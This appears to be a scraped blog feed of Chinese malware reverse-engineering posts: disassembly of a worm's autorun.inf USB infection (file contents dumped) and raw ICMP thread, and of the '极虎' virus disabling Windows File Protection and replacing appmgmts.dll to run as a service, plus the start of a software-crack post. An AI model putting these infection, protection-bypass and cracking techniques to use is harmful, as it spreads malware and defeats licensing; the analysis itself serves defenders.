00877338   .  FF15 30918700 call    dword ptr [<&KERNEL32.SetEndOfFi>; \SetEndOfFile

线程A5:
感染可移动磁盘


008787A4   .  68 80000000   push    80                               ; /FileAttributes = NORMAL
008787A9   .  8D85 E8FDFFFF lea     eax, dword ptr [ebp-218]         ; |
008787AF   .  50            push    eax                              ; |FileName
008787B0   .  FF15 80908700 call    dword ptr [<&KERNEL32.SetFileAtt>; \SetFileAttributesA
008787B6   .  68 80000000   push    80                               ; /设置文件属性recycle.{645FF040-5081-101B-9F08-00AA002F954E}
008787E0   .  50            push    eax                              ; /Path = "MZ",90,"autorun.inf"
008787E1   .  FF15 F0918700 call    dword ptr [<&SHLWAPI.PathFileExi>; \PathFileExistsA
008787E7   .  83F8 01       cmp     eax, 1                           ;  判断autorun.inf是否存在
00878955   > \6A 00         push    0                                ; /hTemplateFile = NULL
00878957   .  68 80000000   push    80                               ; |Attributes = NORMAL
0087895C   .  6A 02         push    2                                ; |Mode = CREATE_ALWAYS
0087895E   .  6A 00         push    0                                ; |pSecurity = NULL
00878960   .  6A 00         push    0                                ; |ShareMode = 0
00878962   .  68 000000C0   push    C0000000                         ; |Access = GENERIC_READ|GENERIC_WRITE
00878967   .  8D85 D8F4FFFF lea     eax, dword ptr [ebp-B28]         ; |
0087896D   .  50            push    eax                              ; |FileName
0087896E   .  FF15 C4908700 call    dword ptr [<&KERNEL32.CreateFile>; \CreateFileA
00878974   .  8985 E4FDFFFF mov     dword ptr [ebp-21C], eax         ;  创建autorun.inf
00878988   > \6A 00         push    0                                ; /pOverlapped = NULL
0087898A   .  8D85 F4FEFFFF lea     eax, dword ptr [ebp-10C]         ; |
00878990   .  50            push    eax                              ; |pBytesWritten
00878991   .  8D85 E0F5FFFF lea     eax, dword ptr [ebp-A20]         ; |
00878997   .  50            push    eax                              ; |/String
00878998   .  FF15 D0908700 call    dword ptr [<&KERNEL32.lstrlenA>] ; |\lstrlenA
0087899E   .  50            push    eax                              ; |nBytesToWrite
0087899F   .  8D85 E0F5FFFF lea     eax, dword ptr [ebp-A20]         ; |
008789A5   .  50            push    eax                              ; |Buffer = 0006EC78
008789A6   .  FFB5 E4FDFFFF push    dword ptr [ebp-21C]              ; |hFile
008789AC   .  FF15 E0908700 call    dword ptr [<&KERNEL32.WriteFile>>; \WriteFile
008789B2   .  FFB5 E4FDFFFF push    dword ptr [ebp-21C]              ; /写入以下内容
0006EC78  5B 61 75 74 6F 72 75 6E 5D 0D 0A 4F 50 45 4E 3D  [autorun]..OPEN=
0006EC88  72 65 63 79 63 6C 65 2E 7B 36 34 35 46 46 30 34  recycle.{645FF04
0006EC98  30 2D 35 30 38 31 2D 31 30 31 42 2D 39 46 30 38  0-5081-101B-9F08
0006ECA8  2D 30 30 41 41 30 30 32 46 39 35 34 45 7D 5C 53  -00AA002F954E}\S
0006ECB8  65 74 75 70 2E 65 78 65 0D 0A 73 68 65 6C 6C 5C  etup.exe..shell\
0006ECC8  6F 70 65 6E 3D B4 F2 BF AA 28 26 4F 29 0D 0A 73  open=打开(&O)..s
0006ECD8  68 65 6C 6C 5C 6F 70 65 6E 5C 43 6F 6D 6D 61 6E  hell\open\Comman
0006ECE8  64 3D 72 65 63 79 63 6C 65 2E 7B 36 34 35 46 46  d=recycle.{645FF
0006ECF8  30 34 30 2D 35 30 38 31 2D 31 30 31 42 2D 39 46  040-5081-101B-9F
0006ED08  30 38 2D 30 30 41 41 30 30 32 46 39 35 34 45 7D  08-00AA002F954E}
0006ED18  5C 53 65 74 75 70 2E 65 78 65 20 53 68 6F 77 0D  \Setup.exe Show.
0006ED28  0A 73 68 65 6C 6C 5C 6F 70 65 6E 5C 44 65 66 61  .shell\open\Defa
0006ED38  75 6C 74 3D 31 2F 2F 0D 0A 73 68 65 6C 6C 5C 65  ult=1//..shell\e
0006ED48  78 70 6C 6F 72 65 3D D7 CA D4 B4 B9 DC C0 ED C6  xplore=资源管理
0006ED58  F7 28 26 58 29 0D 0A 73 68 65 6C 6C 5C 65 78 70  ?&X)..shell\exp
0006ED68  6C 6F 72 65 5C 43 6F 6D 6D 61 6E 64 3D 72 65 63  lore\Command=rec
0006ED78  79 63 6C 65 2E 7B 36 34 35 46 46 30 34 30 2D 35  ycle.{645FF040-5
0006ED88  30 38 31 2D 31 30 31 42 2D 39 46 30 38 2D 30 30  081-101B-9F08-00
0006ED98  41 41 30 30 32 46 39 35 34 45 7D 5C 53 65 74 75  AA002F954E}\Setu
0006EDA8  70 2E 65 78 65 20 53 68 6F 77                    p.exe Show
008789BE   .  6A 00         push    0                                ; /pSecurity = NULL
008789C0   .  8D85 F8FEFFFF lea     eax, dword ptr [ebp-108]         ; |
008789C6   .  50            push    eax                              ; |Path
008789C7   .  FF15 84908700 call    dword ptr [<&KERNEL32.CreateDire>; \CreateDirectoryA
008789CD   .  8D85 F8FEFFFF lea     eax, dword ptr [ebp-108]         ;  创建目录recycle.{645FF040-5081-101B-9F08-00AA002F954E}
008789F0   > \6A 00         push    0                                ; /hTemplateFile = NULL
008789F2   .  68 80000000   push    80                               ; |Attributes = NORMAL
008789F7   .  6A 02         push    2                                ; |Mode = CREATE_ALWAYS
008789F9   .  6A 00         push    0                                ; |pSecurity = NULL
008789FB   .  6A 00         push    0                                ; |ShareMode = 0
008789FD   .  68 000000C0   push    C0000000                         ; |Access = GENERIC_READ|GENERIC_WRITE
00878A02   .  8D85 E8FDFFFF lea     eax, dword ptr [ebp-218]         ; |
00878A08   .  50            push    eax                              ; |FileName
00878A09   .  FF15 C4908700 call    dword ptr [<&KERNEL32.CreateFile>; \CreateFileA
00878A0F   .  8985 E4FDFFFF mov     dword ptr [ebp-21C], eax         ;  创建recycle.{645FF040-5081-101B-9F08-00AA002F954E}\Setup.exe

线程A6(无限循环):


0878043   .  6A 40         push    40                               ; /BufSize = 40 (64.)
00878045   .  8D85 28FEFFFF lea     eax, dword ptr [ebp-1D8]         ; |
0087804B   .  50            push    eax                              ; |Buffer
0087804C   .  FF15 74928700 call    dword ptr [<&WS2_32.#57>]        ; \gethostname
00878052   .  8D85 28FEFFFF lea     eax, dword ptr [ebp-1D8]         ;  得到主机名
00878058   .  50            push    eax                              ; /Name
00878059   .  FF15 2C928700 call    dword ptr [<&WS2_32.#52>]        ; \gethostbyname
00877ABF   > \6A 01         push    1                                ; /Protocol = IPPROTO_ICMP
00877AC1   .  6A 03         push    3                                ; |Type = SOCK_RAW
00877AC3   .  6A 02         push    2                                ; |Family = AF_INET
00877AC5   .  FF15 34928700 call    dword ptr [<&WS2_32.#23>]        ; \socket
00877ACB   .  8945 FC       mov     dword ptr [ebp-4], eax           ;  创建套接字
00877B04   .  FF70 10       push    dword ptr [eax+10]               ; /AddrLen
00877B07   .  8B85 40FAFEFF mov     eax, dword ptr [ebp+FFFEFA40]    ; |
00877B0D   .  FF70 18       push    dword ptr [eax+18]               ; |pSockAddr
00877B10   .  FF75 FC       push    dword ptr [ebp-4]                ; |Socket
00877B13   .  FF15 60928700 call    dword ptr [<&WS2_32.#2>]         ; \bind
00877B19   .  83F8 FF       cmp     eax, -1                          ;  绑定
00877974  |.  6A 00         push    0                                ; /Callback = NULL
00877976  |.  FF75 1C       push    dword ptr [ebp+1C]               ; |pOverlapped
00877979  |.  FF75 18       push    dword ptr [ebp+18]               ; |pFromSize
0087797C  |.  FF75 14       push    dword ptr [ebp+14]               ; |pFrom
0087797F  |.  8D45 F8       lea     eax, dword ptr [ebp-8]           ; |
00877982  |.  50            push    eax                              ; |pFlags
00877983  |.  8D45 F4       lea     eax, dword ptr [ebp-C]           ; |
00877986  |.  50            push    eax                              ; |pReceivedCount
00877987  |.  6A 01         push    1                                ; |nBuffers = 1
00877989  |.  8D45 EC       lea     eax, dword ptr [ebp-14]          ; |
0087798C  |.  50            push    eax                              ; |pBuffers
0087798D  |.  FF75 08       push    dword ptr [ebp+8]                ; |Socket
00877990  |.  FF15 6C928700 call    dword ptr [<&WS2_32.WSARecvFrom>>; \WSARecvFrom
00877996  |.  8945 FC       mov     dword ptr [ebp-4], eax           ;  接受
00877C1C   .  FF70 10       push    dword ptr [eax+10]               ; /ToLength
00877C1F   .  8B85 F4FBFFFF mov     eax, dword ptr [ebp-40C]         ; |
00877C25   .  FF70 18       push    dword ptr [eax+18]               ; |pTo
00877C28   .  6A 00         push    0                                ; |Flags = 0
00877C2A   .  FFB5 B8F9FEFF push    dword ptr [ebp+FFFEF9B8]         ; |DataSize
00877C30   .  8D85 F8FBFFFF lea     eax, dword ptr [ebp-408]         ; |
00877C36   .  50            push    eax                              ; |Data = 0005EA74
00877C37   .  FF75 FC       push    dword ptr [ebp-4]                ; |Socket
00877C3A   .  FF15 64928700 call    dword ptr [<&WS2_32.#20>]        ; \sendto
00877C40   .  83F8 FF       cmp     eax, -1                          ;  发送...
]]> http://www.lingdux.com/2010/216.html/feed 0 极虎病毒样本分析 http://www.lingdux.com/2010/194.html http://www.lingdux.com/2010/194.html#comments Wed, 16 Jun 2010 13:38:10 +0000 零度x http://www.lingdux.com/?p=194 阅读全文——共12310字]]> 样本下载:http://vip.begin09.com/thread-5745-1-1.html

只分析了exe运行的情况,关闭windows文件保护,更改自身属性为DLL,写入C:\WINDOWS\system32\appmgmts.dll并以服务方式启动,dll下次在分析,今天没时间了~

00401B9A  |.  6A 1C         push    1C                               ; /BufSize = 1C (28.)
00401B9C  |.  8D45 E4       lea     eax, dword ptr [ebp-1C]          ; |
00401B9F  |.  50            push    eax                              ; |Buffer
00401BA0  |.  FF75 E0       push    dword ptr [ebp-20]               ; |Address
00401BA3  |.  FF15 2C914000 call    dword ptr [<&KERNEL32.VirtualQue>; \VirtualQuery
00401BA9  |.  8B45 E8       mov     eax, dword ptr [ebp-18]          ;  VirTualQuery获取内存信息
00401BAC  |.  A3 38DC4000   mov     dword ptr [40DC38], eax
00401BB1  |.  6A 00         push    0                                ; /pModule = NULL
00401BB3  |.  FF15 04914000 call    dword ptr [<&KERNEL32.GetModuleH>; \GetModuleHandleA
00401BB9  |.  3B05 38DC4000 cmp     eax, dword ptr [40DC38]          ;  GetModuleHandle获取当前模块基址
00401BBF  |.  75 16         jnz     short 00401BD7                   ;  两者比较,不要相等则退出线程


00402056   .  FF15 14924000 call    dword ptr [<&USER32.GetInputStat>; [GetInputState
0040205C   .  6A 00         push    0                                ; /lParam = 0
0040205E   .  6A 00         push    0                                ; |wParam = 0
00402060   .  6A 00         push    0                                ; |Message = WM_NULL
00402062   .  FF15 48914000 call    dword ptr [<&KERNEL32.GetCurrent>; |[GetCurrentThreadId
00402068   .  50            push    eax                              ; |ThreadId
00402069   .  FF15 18924000 call    dword ptr [<&USER32.PostThreadMe>; \PostThreadMessageA
0040206F   .  6A 00         push    0                                ; /MsgFilterMax = 0
00402071   .  6A 00         push    0                                ; |MsgFilterMin = 0
00402073   .  6A 00         push    0                                ; |hWnd = NULL
00402075   .  8D85 BCFDFFFF lea     eax, dword ptr [ebp-244]         ; |
0040207B   .  50            push    eax                              ; |pMsg
0040207C   .  FF15 0C924000 call    dword ptr [<&USER32.GetMessageA>>; \GetMessageA
[/courcecode]
1
004064B4  |.  68 04010000   push    104                              ; /BufSize = 104 (260.)
004064B9  |.  8D85 D8FDFFFF lea     eax, dword ptr [ebp-228]         ; |
004064BF  |.  50            push    eax                              ; |PathBuffer
004064C0  |.  6A 00         push    0                                ; |hModule = NULL
004064C2  |.  FF15 00914000 call    dword ptr [<&KERNEL32.GetModuleF>; \GetModuleFileNameA
004064C8  |.  68 04010000   push    104                              ; /获取当前路径
004064CD  |.  6A 00         push    0                                ; |c = 00
004064CF  |.  8D85 E0FEFFFF lea     eax, dword ptr [ebp-120]         ; |
004064D5  |.  50            push    eax                              ; |s
004064D6  |.  E8 67290000   call    <jmp.&MSVCRT.memset>             ; \memset
004064DB  |.  83C4 0C       add     esp, 0C
004064DE  |.  8D85 D8FDFFFF lea     eax, dword ptr [ebp-228]
004064E4  |.  50            push    eax                              ; /String2
004064E5  |.  8D85 E0FEFFFF lea     eax, dword ptr [ebp-120]         ; |
004064EB  |.  50            push    eax                              ; |String1
004064EC  |.  FF15 1C914000 call    dword ptr [<&KERNEL32.lstrcpyA>] ; \lstrcpyA
004064F2  |.  68 01010000   push    101                              ; /n = 101 (257.)
004064F7  |.  6A 00         push    0                                ; |c = 00
004064F9  |.  8D85 E3FEFFFF lea     eax, dword ptr [ebp-11D]         ; |
004064FF  |.  50            push    eax                              ; |s
00406500  |.  E8 3D290000   call    <jmp.&MSVCRT.memset>             ; \memset
00406505  |.  83C4 0C       add     esp, 0C                          ;  保留路径前三个字节(获取当前磁盘)
00406508  |.  8D85 E0FEFFFF lea     eax, dword ptr [ebp-120]
0040650E  |.  50            push    eax                              ; /RootPathName
0040650F  |.  FF15 A4904000 call    dword ptr [<&KERNEL32.GetDriveTy>; \GetDriveTypeA
00406515  |.  83F8 02       cmp     eax, 2                           ;  判断当前磁盘类型
00406518  |.  75 39         jnz     short 00406553                   ;  ---------------------------------
0040651A  |.  8D85 E0FEFFFF lea     eax, dword ptr [ebp-120]
00406520  |.  50            push    eax                              ; /<%s>
00406521  |.  68 A09A4000   push    00409AA0                         ; |Format = "/n,%s"
00406526  |.  8D85 98FDFFFF lea     eax, dword ptr [ebp-268]         ; |
0040652C  |.  50            push    eax                              ; |s
0040652D  |.  FF15 10924000 call    dword ptr [<&USER32.wsprintfA>]  ; \wsprintfA
00406533  |.  83C4 0C       add     esp, 0C
00406536  |.  6A 05         push    5                                ; /IsShown = 5
00406538  |.  6A 00         push    0                                ; |DefDir = NULL
0040653A  |.  8D85 98FDFFFF lea     eax, dword ptr [ebp-268]         ; |
00406540  |.  50            push    eax                              ; |Parameters
00406541  |.  68 A89A4000   push    00409AA8                         ; |FileName = "explorer.exe"
00406546  |.  68 B89A4000   push    00409AB8                         ; |Operation = "open"
0040654B  |.  6A 00         push    0                                ; |hWnd = NULL
0040654D  |.  FF15 E4914000 call    dword ptr [<&SHELL32.ShellExecut>; \ShellExecuteA
00406553  |>  C745 EC C09A4>mov     dword ptr [ebp-14], 00409AC0     ;  ---如果为移动设备则打explorer---
00401681  |> \6A 00         push    0                                ; /hTemplateFile = NULL
00401683  |.  68 80000000   push    80                               ; |Attributes = NORMAL
00401688  |.  FFB5 E8FEFFFF push    dword ptr [ebp-118]              ; |Mode
0040168E  |.  6A 00         push    0                                ; |pSecurity = NULL
00401690  |.  6A 03         push    3                                ; |ShareMode = FILE_SHARE_READ|FILE_SHARE_WRITE
00401692  |.  68 000000C0   push    C0000000                         ; |Access = GENERIC_READ|GENERIC_WRITE
00401697  |.  68 08934000   push    00409308                         ; |FileName = "C:\DelInfo.bin"
0040169C  |.  FF15 C4904000 call    dword ptr [<&KERNEL32.CreateFile>; \CreateFileA
004016A2  |.  8985 ECFEFFFF mov     dword ptr [ebp-114], eax         ;  创建文件C:\Delinfo.bin

 

0040175C  |> \6A 00         push    0                                ; /pOverlapped = NULL
0040175E  |.  8D45 FC       lea     eax, dword ptr [ebp-4]           ; |
00401761  |.  50            push    eax                              ; |pBytesWritten
00401762  |.  6A 04         push    4                                ; |nBytesToWrite = 4
00401764  |.  8D45 0C       lea     eax, dword ptr [ebp+C]           ; |
00401767  |.  50            push    eax                              ; |Buffer
00401768  |.  FFB5 ECFEFFFF push    dword ptr [ebp-114]              ; |hFile
0040176E  |.  FF15 E0904000 call    dword ptr [<&KERNEL32.WriteFile>>; \WriteFile
00401774  |.  6A 00         push    0                                ; /写入01000000
00401776  |.  8D45 FC       lea     eax, dword ptr [ebp-4]           ; |
00401779  |.  50            push    eax                              ; |pBytesWritten
0040177A  |.  FF75 08       push    dword ptr [ebp+8]                ; |/String
0040177D  |.  FF15 D0904000 call    dword ptr [<&KERNEL32.lstrlenA>] ; |\lstrlenA
00401783  |.  50            push    eax                              ; |nBytesToWrite
00401784  |.  FF75 08       push    dword ptr [ebp+8]                ; |Buffer
00401787  |.  FFB5 ECFEFFFF push    dword ptr [ebp-114]              ; |hFile
0040178D  |.  FF15 E0904000 call    dword ptr [<&KERNEL32.WriteFile>>; \WriteFile
00401793  |.  FFB5 ECFEFFFF push    dword ptr [ebp-114]              ; /01000000之后写入自身路径
00401799  |.  FF15 10914000 call    dword ptr [<&KERNEL32.CloseHandl>; \CloseHandle

 

00401C0B  |.  68 04010000   push    104                              ; /BufSize = 104 (260.)
00401C10  |.  8D85 E8FEFFFF lea     eax, dword ptr [ebp-118]         ; |
00401C16  |.  50            push    eax                              ; |PathBuffer
00401C17  |.  FF75 08       push    dword ptr [ebp+8]                ; |hModule
00401C1A  |.  FF15 00914000 call    dword ptr [<&KERNEL32.GetModuleF>; \GetModuleFileNameA
00401C20  |.  83A5 E0FEFFFF>and     dword ptr [ebp-120], 0           ;  获取路径
00401C27  |.  EB 0D         jmp     short 00401C36
00401C29  |>  8B85 E0FEFFFF /mov     eax, dword ptr [ebp-120]
00401C2F  |.  40            |inc     eax
00401C30  |.  8985 E0FEFFFF |mov     dword ptr [ebp-120], eax
00401C36  |>  83BD E0FEFFFF> cmp     dword ptr [ebp-120], 32
00401C3D  |.  7D 31         |jge     short 00401C70
00401C3F  |.  6A 00         |push    0                               ; /hTemplateFile = NULL
00401C41  |.  6A 00         |push    0                               ; |Attributes = 0
00401C43  |.  6A 03         |push    3                               ; |Mode = OPEN_EXISTING
00401C45  |.  6A 00         |push    0                               ; |pSecurity = NULL
00401C47  |.  6A 01         |push    1                               ; |ShareMode = FILE_SHARE_READ
00401C49  |.  68 00000080   |push    80000000                        ; |Access = GENERIC_READ
00401C4E  |.  8D85 E8FEFFFF |lea     eax, dword ptr [ebp-118]        ; |
00401C54  |.  50            |push    eax                             ; |FileName
00401C55  |.  FF15 C4904000 |call    dword ptr [<&KERNEL32.CreateFil>; \CreateFileA
00401C5B  |.  8945 F4       |mov     dword ptr [ebp-C], eax          ;  打开自身

00401C70  |> \6A 00         push    0                                ; /pFileSizeHigh = NULL
00401C72  |.  FF75 F4       push    dword ptr [ebp-C]                ; |hFile
00401C75  |.  FF15 24914000 call    dword ptr [<&KERNEL32.GetFileSiz>; \GetFileSize
00401C7B  |.  8945 F8       mov     dword ptr [ebp-8], eax           ;  得到自身大小

00401CEF  |.  6A 00         push    0                                ; /pOverlapped = NULL
00401CF1  |.  8D45 FC       lea     eax, dword ptr [ebp-4]           ; |
00401CF4  |.  50            push    eax                              ; |pBytesRead
00401CF5  |.  FF75 F8       push    dword ptr [ebp-8]                ; |BytesToRead
00401CF8  |.  FFB5 E4FEFFFF push    dword ptr [ebp-11C]              ; |Buffer
00401CFE  |.  FF75 F4       push    dword ptr [ebp-C]                ; |hFile
00401D01  |.  FF15 EC904000 call    dword ptr [<&KERNEL32.ReadFile>] ; \ReadFile
00401D07  |.  FF75 F4       push    dword ptr [ebp-C]                ; /把自身读入缓冲区
00401D0A  |.  FF15 10914000 call    dword ptr [<&KERNEL32.CloseHandl>; \CloseHandle

 

004020AE   .  68 04010000   push    104                              ; /BufSize = 104 (260.)
004020B3   .  8D85 D8FDFFFF lea     eax, dword ptr [ebp-228]         ; |
004020B9   .  50            push    eax                              ; |Buffer
004020BA   .  FF15 38914000 call    dword ptr [<&KERNEL32.GetWindows>; \GetWindowsDirectoryA
004020C0   .  68 04010000   push    104                              ; /得到系统目录
004020C5   .  6A 00         push    0                                ; |c = 00
004020C7   .  8D85 E8FEFFFF lea     eax, dword ptr [ebp-118]         ; |
004020CD   .  50            push    eax                              ; |s
004020CE   .  E8 6F6D0000   call    <jmp.&MSVCRT.memset>             ; \memset
004020D3   .  83C4 0C       add     esp, 0C
004020D6   .  8D85 E8FEFFFF lea     eax, dword ptr [ebp-118]
004020DC   .  50            push    eax                              ; /Buffer
004020DD   .  68 04010000   push    104                              ; |BufSize = 104 (260.)
004020E2   .  FF15 4C914000 call    dword ptr [<&KERNEL32.GetTempPat>; \GetTempPathA
004020E8   .  68 3F000F00   push    0F003F                           ;  得到临时目录

 

04020ED   .  6A 00         push    0
004020EF   .  6A 00         push    0
004020F1   .  FF15 18904000 call    dword ptr [<&ADVAPI32.OpenSCMana>;  ADVAPI32.OpenSCManagerA
004020F7   .  8945 FC       mov     dword ptr [ebp-4], eax           ;  打开scm
004020FA   .  68 B0944000   push    004094B0                         ; /FileName = "sfc_os.dll"
004020FF   .  FF15 40914000 call    dword ptr [<&KERNEL32.LoadLibrar>; \LoadLibraryA
00402105   .  8985 B4F9FFFF mov     dword ptr [ebp-64C], eax         ;  加载sfc_os.dll

0040211E   > \6A 05         push    5                                ; /ProcNameOrOrdinal = #5
00402120   .  FFB5 B4F9FFFF push    dword ptr [ebp-64C]              ; |hModule
00402126   .  FF15 F4904000 call    dword ptr [<&KERNEL32.GetProcAdd>; \GetProcAddress
0040212C   .  A3 44DC4000   mov     dword ptr [40DC44], eax          ;  获取SetSfcFileException

 

004021B8   > \68 FF010F00   push    0F01FF
004021BD   .  8D85 30F4FFFF lea     eax, dword ptr [ebp-BD0]
004021C3   .  50            push    eax
004021C4   .  FF75 FC       push    dword ptr [ebp-4]
004021C7   .  FF15 14904000 call    dword ptr [<&ADVAPI32.OpenServic>;  ADVAPI32.OpenServiceA
004021CD   .  8985 E0FEFFFF mov     dword ptr [ebp-120], eax         ;  打开AppMgmt(服务管理器)

004021FA   .  50            push    eax
004021FB   .  FFB5 E0FEFFFF push    dword ptr [ebp-120]
00402201   .  FF15 04904000 call    dword ptr [<&ADVAPI32.QueryServi>;  ADVAPI32.QueryServiceStatus
00402207   .  83BD D8F3FFFF>cmp     dword ptr [ebp-C28], 1           ;  查询服务状态

0040225C   .  8D85 F0F3FFFF lea     eax, dword ptr [ebp-C10]
00402262   .  50            push    eax                              ; /<%s>
00402263   .  8D85 D8FDFFFF lea     eax, dword ptr [ebp-228]         ; |
00402269   .  50            push    eax                              ; |<%s>
0040226A   .  68 BC944000   push    004094BC                         ; |Format = "%s\system32\%s.dll"
0040226F   .  8D85 A8F8FFFF lea     eax, dword ptr [ebp-758]         ; |
00402275   .  50            push    eax                              ; |s
00402276   .  FF15 10924000 call    dword ptr [<&USER32.wsprintfA>]  ; \wsprintfA
0040227C   .  83C4 10       add     esp, 10                          ;  构造字符串C:\WINDOWS\system32\appmgmts.dll
0040227F   .  8D85 A8F8FFFF lea     eax, dword ptr [ebp-758]
00402285   .  50            push    eax

00401E53   .  FF75 08       push    dword ptr [ebp+8]                            ; /Path = "C:\WINDOWS\system32\appmgmts.dll"
00401E56   .  FF15 F0914000 call    dword ptr [<&SHLWAPI.PathFileExistsA>]       ; \PathFileExistsA
00401E5C   .  83F8 01       cmp     eax, 1                                       ;  判断C:\WINDOWS\system32\appmgmts.dll是否存在

00401E91   .  FFB5 B4F7FFFF push    dword ptr [ebp-84C]                          ; /WideBufSize
00401E97   .  8D85 B8F7FFFF lea     eax, dword ptr [ebp-848]                     ; |
00401E9D   .  50            push    eax                                          ; |WideCharBuf
00401E9E   .  FFB5 B4F7FFFF push    dword ptr [ebp-84C]                          ; |StringSize
00401EA4   .  FF75 08       push    dword ptr [ebp+8]                            ; |StringToMap = "C:\WINDOWS\system32\appmgmts.dll"
00401EA7   .  6A 00         push    0                                            ; |Options = 0
00401EA9   .  6A 00         push    0                                            ; |CodePage = CP_ACP
00401EAB   .  FF15 98904000 call    dword ptr [<&KERNEL32.MultiByteToWideChar>]  ; \MultiByteToWideChar
00401EB1   .  8365 FC 00    and     dword ptr [ebp-4], 0                         ;  转换"C:\WINDOWS\system32\appmgmts.dll"成unicode
00401EB5   .  6A FF         push    -1
00401EB7   .  8D85 B8F7FFFF lea     eax, dword ptr [ebp-848]
00401EBD   .  50            push    eax
00401EBE   .  6A 00         push    0
00401EC0   .  68 F91E4000   push    00401EF9
00401EC5   .  8BFF          mov     edi, edi
00401EC7   .  55            push    ebp
00401EC8   .  A1 44DC4000   mov     eax, dword ptr [40DC44]
00401ECD   .  83C0 03       add     eax, 3
00401ED0   .  FFE0          jmp     eax                                          ;  关闭windows文件保护

 

0401F14   > \6A 00         push    0                                            ; /hTemplateFile = NULL
00401F16   .  6A 00         push    0                                            ; |Attributes = 0
00401F18   .  FF75 D0       push    dword ptr [ebp-30]                           ; |Mode
00401F1B   .  6A 00         push    0                                            ; |pSecurity = NULL
00401F1D   .  6A 00         push    0                                            ; |ShareMode = 0
00401F1F   .  68 000000C0   push    C0000000                                     ; |Access = GENERIC_READ|GENERIC_WRITE
00401F24   .  FF75 08       push    dword ptr [ebp+8]                            ; |FileName
00401F27   .  FF15 C4904000 call    dword ptr [<&KERNEL32.CreateFileA>]          ; \CreateFileA
00401F2D   .  8945 D4       mov     dword ptr [ebp-2C], eax                      ;  打开C:\WINDOWS\system32\appmgmts.dll

00401F50   .  50            push    eax                                          ; /pLastWrite = 0012F304
00401F51   .  8D45 C0       lea     eax, dword ptr [ebp-40]                      ; |
00401F54   .  50            push    eax                                          ; |pLastAccess
00401F55   .  8D45 B8       lea     eax, dword ptr [ebp-48]                      ; |
00401F58   .  50            push    eax                                          ; |pCreationTime
00401F59   .  FF75 D4       push    dword ptr [ebp-2C]                           ; |hFile
00401F5C   .  FF15 44914000 call    dword ptr [<&KERNEL32.GetFileTime>]          ; \GetFileTime
00401F62   .  837D D0 02    cmp     dword ptr [ebp-30], 2                        ;  获取文件时间

00401F9A   > \6A 00         push    0                                            ; /Origin = FILE_BEGIN
00401F9C   .  6A 00         push    0                                            ; |pOffsetHi = NULL
00401F9E   .  FF75 DC       push    dword ptr [ebp-24]                           ; |OffsetLo
00401FA1   .  FF75 D4       push    dword ptr [ebp-2C]                           ; |hFile
00401FA4   .  FF15 28914000 call    dword ptr [<&KERNEL32.SetFilePointer>]       ; \SetFilePointer
00401FAA   .  A1 3CDC4000   mov     eax, dword ptr [40DC3C]                      ;  设置文件指针到文件偏移3C
00401FAF   .  0345 DC       add     eax, dword ptr [ebp-24]
00401FB2   .  8945 E4       mov     dword ptr [ebp-1C], eax
00401FB5   .  6A 00         push    0                                            ; /pOverlapped = NULL
00401FB7   .  8D45 D8       lea     eax, dword ptr [ebp-28]                      ; |
00401FBA   .  50            push    eax                                          ; |pBytesWritten
00401FBB   .  A1 40DC4000   mov     eax, dword ptr [40DC40]                      ; |
00401FC0   .  2B45 DC       sub     eax, dword ptr [ebp-24]                      ; |
00401FC3   .  50            push    eax                                          ; |nBytesToWrite
00401FC4   .  FF75 E4       push    dword ptr [ebp-1C]                           ; |Buffer
00401FC7   .  FF75 D4       push    dword ptr [ebp-2C]                           ; |hFile
00401FCA   .  FF15 E0904000 call    dword ptr [<&KERNEL32.WriteFile>]            ; \WriteFile
00401FD0   .  85C0          test    eax, eax                                     ;  写入数据C:\WINDOWS\system32\appmgmts.dll

00401FE1   > \6A 00         push    0                                            ; /Origin = FILE_BEGIN
00401FE3   .  6A 00         push    0                                            ; |pOffsetHi = NULL
00401FE5   .  FF35 40DC4000 push    dword ptr [40DC40]                           ; |OffsetLo = 3CC00 (248832.)
00401FEB   .  FF75 D4       push    dword ptr [ebp-2C]                           ; |hFile
00401FEE   .  FF15 28914000 call    dword ptr [<&KERNEL32.SetFilePointer>]       ; \SetFilePointer
00401FF4   .  FF75 D4       push    dword ptr [ebp-2C]                           ; /hFile
00401FF7   .  FF15 30914000 call    dword ptr [<&KERNEL32.SetEndOfFile>]         ; \SetEndOfFile

00401FE1   > \6A 00         push    0                                            ; /Origin = FILE_BEGIN
00401FE3   .  6A 00         push    0                                            ; |pOffsetHi = NULL
00401FE5   .  FF35 40DC4000 push    dword ptr [40DC40]                           ; |OffsetLo = 3CC00 (248832.)
00401FEB   .  FF75 D4       push    dword ptr [ebp-2C]                           ; |hFile
00401FEE   .  FF15 28914000 call    dword ptr [<&KERNEL32.SetFilePointer>]       ; \SetFilePointer
00401FF4   .  FF75 D4       push    dword ptr [ebp-2C]                           ; /hFile
00401FF7   .  FF15 30914000 call    dword ptr [<&KERNEL32.SetEndOfFile>]         ; \SetEndOfFile
00401FFD   .  8D45 C8       lea     eax, dword ptr [ebp-38]                      ;  把自身写进C:\WINDOWS\system32\appmgmts.dll
00402000   .  50            push    eax                                          ; /pLastWrite
00402001   .  8D45 C0       lea     eax, dword ptr [ebp-40]                      ; |
00402004   .  50            push    eax                                          ; |pLastAccess
00402005   .  8D45 B8       lea     eax, dword ptr [ebp-48]                      ; |
00402008   .  50            push    eax                                          ; |pCreationTime
00402009   .  FF75 D4       push    dword ptr [ebp-2C]                           ; |hFile
0040200C   .  FF15 34914000 call    dword ptr [<&KERNEL32.SetFileTime>]          ; \SetFileTime
00402012   .  FF75 D4       push    dword ptr [ebp-2C]                           ;  还原设置文件时间

 

00402293   > \6A 00         push    0
00402295   .  6A 00         push    0
00402297   .  FFB5 E0FEFFFF push    dword ptr [ebp-120]
0040229D   .  FF15 24904000 call    dword ptr [<&ADVAPI32.StartServiceA>]        ;  ADVAPI32.StartServiceA启动服务
]]> http://www.lingdux.com/2010/194.html/feed 3 EZ VIDEO TO AVI Converter注册码分析 http://www.lingdux.com/2010/169.html http://www.lingdux.com/2010/169.html#comments Fri, 07 May 2010 04:01:01 +0000 零度x http://www.lingdux.com/?p=169 阅读全文——共9021字]]> Eztoo AVI Video Converter 是一个功能强大的AVI格式转换工具,可以将MPEG(MPG)、WMV(ASF、ASX)、AVI(DivX、XviD)、VCD格式转换为AVI格式的文件。它使用方便,鼠标点击就可以完成转换,转换速度很快,质量也很好,支持进行批量和自动转换,也可以自己设定相应的参数来输出AVI文件。在它的帮助下,转换工作变得非常轻松。 

下载地址:http://www.newhua.com/soft/56777.htm

安装后运行,提示注册,随意输入提示“invalid register code! please retry!”

然后找字符串的调用位置如下:

004B03F6   .  55            push    ebp
004B03F7   .  68 FE054B00   push    004B05FE
